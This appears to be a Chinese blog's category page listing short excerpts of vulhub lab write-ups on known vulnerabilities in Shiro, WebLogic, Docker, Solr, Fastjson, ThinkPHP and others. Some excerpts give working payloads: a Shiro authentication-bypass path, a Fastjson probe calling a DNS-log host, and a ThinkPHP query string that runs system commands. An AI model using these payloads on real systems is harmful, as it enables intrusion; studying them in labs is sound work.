vulhub
文章平均质量分 64
ErYao7
这个作者很懒,什么都没留下…
展开
-
vulhub漏洞——Apache Shiro 身份验证绕过漏洞 (CVE-2020-1957)
无法访问对管理页面的直接请求,/admin/并将被重定向到登录页面。构造一个恶意请求/xxx/..;/admin/以绕过身份验证检查并访问管理页面。原创 2022-01-14 10:40:10 · 2517 阅读 · 0 评论 -
vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。漏洞环境原创 2021-12-20 12:30:35 · 2827 阅读 · 0 评论 -
vulhub漏洞—docker_daemon_api未授权访问漏洞
docker remote apidocker remote api主要的目的是取代命令行界面,docker client和docker daemon通过unix domain socket进行通信.默认情况下,只有本机的root和docker组用户才能操作docker.漏洞成因dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375docker守护进程监听在0.0.0.0,外网可访问没有使用iptable等限制可连接的来源原创 2021-12-17 19:11:35 · 1308 阅读 · 0 评论 -
vulhub漏洞—php环境XML外部实体注入漏洞(XXE)
PHP环境 XML外部实体注入漏洞(XXE)XXE知识总结环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。vulhub搭建漏洞:github位置:https://github.com/vulhub/vulhub/tree/master/php/php_xxe使用如下命令编译原创 2021-12-17 16:52:36 · 789 阅读 · 0 评论 -
vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞
漏洞描述Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。影响范围Apache Solr <= 8.8.1复现过程漏洞环境vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md执行如下命令启动solr 8.8.1:原创 2021-12-17 15:02:46 · 350 阅读 · 0 评论 -
vulhub漏洞——ActiveMQ
访问 3128 端口Goby扫描资产原创 2021-12-07 16:40:34 · 731 阅读 · 0 评论 -
vulhub漏洞——fastjson
我们只知道一个IPnmap扫描端口我们可以看到 8090opsmessagingXary扫描没有发现漏洞访问 8090 端口fastjson反序列化漏洞验证POCDNSLog Platform获取dnslogburp抓包修改数据包POSTContent-Type: application/json{"zeo":{"@type":"java.net.Inet4Address","val":"m7ds09.dnslog.cn"}} //va.原创 2021-12-05 23:52:52 · 3336 阅读 · 6 评论 -
vulhub漏洞—Heartbleed
漏洞描述:心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。Heartbl原创 2021-12-03 23:11:53 · 764 阅读 · 0 评论 -
vulhub漏洞—weblogic SSRF
文接上回vubhub漏洞—weblogic RCE_ErYao7的博客-CSDN博客一开始只知道一个IP212.129.248.63使用nmap扫描开放的端口经过尝试我们发现 7001 端口是我们的要打的靶机漏洞使用 Xary 扫描xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html漏洞利用...https://blog.csdn.net/weixin_45808483/artic原创 2021-12-03 16:17:01 · 840 阅读 · 0 评论 -
vulhub漏洞—weblogic RCE
一开始只知道一个IP212.129.248.63使用nmap扫描开放的端口经过尝试我们发现 7001 端口是我们的要打的靶机漏洞使用 Xary 扫描xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html漏洞利用...原创 2021-12-02 23:55:30 · 1058 阅读 · 0 评论 -
vulhub漏洞—ThinkPHP
/index.php?s=captcha_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=pwd原创 2021-12-02 13:15:53 · 419 阅读 · 0 评论 -
vulhub漏洞—shiro框架
记录一些学习笔记原创 2021-12-02 09:38:51 · 1597 阅读 · 0 评论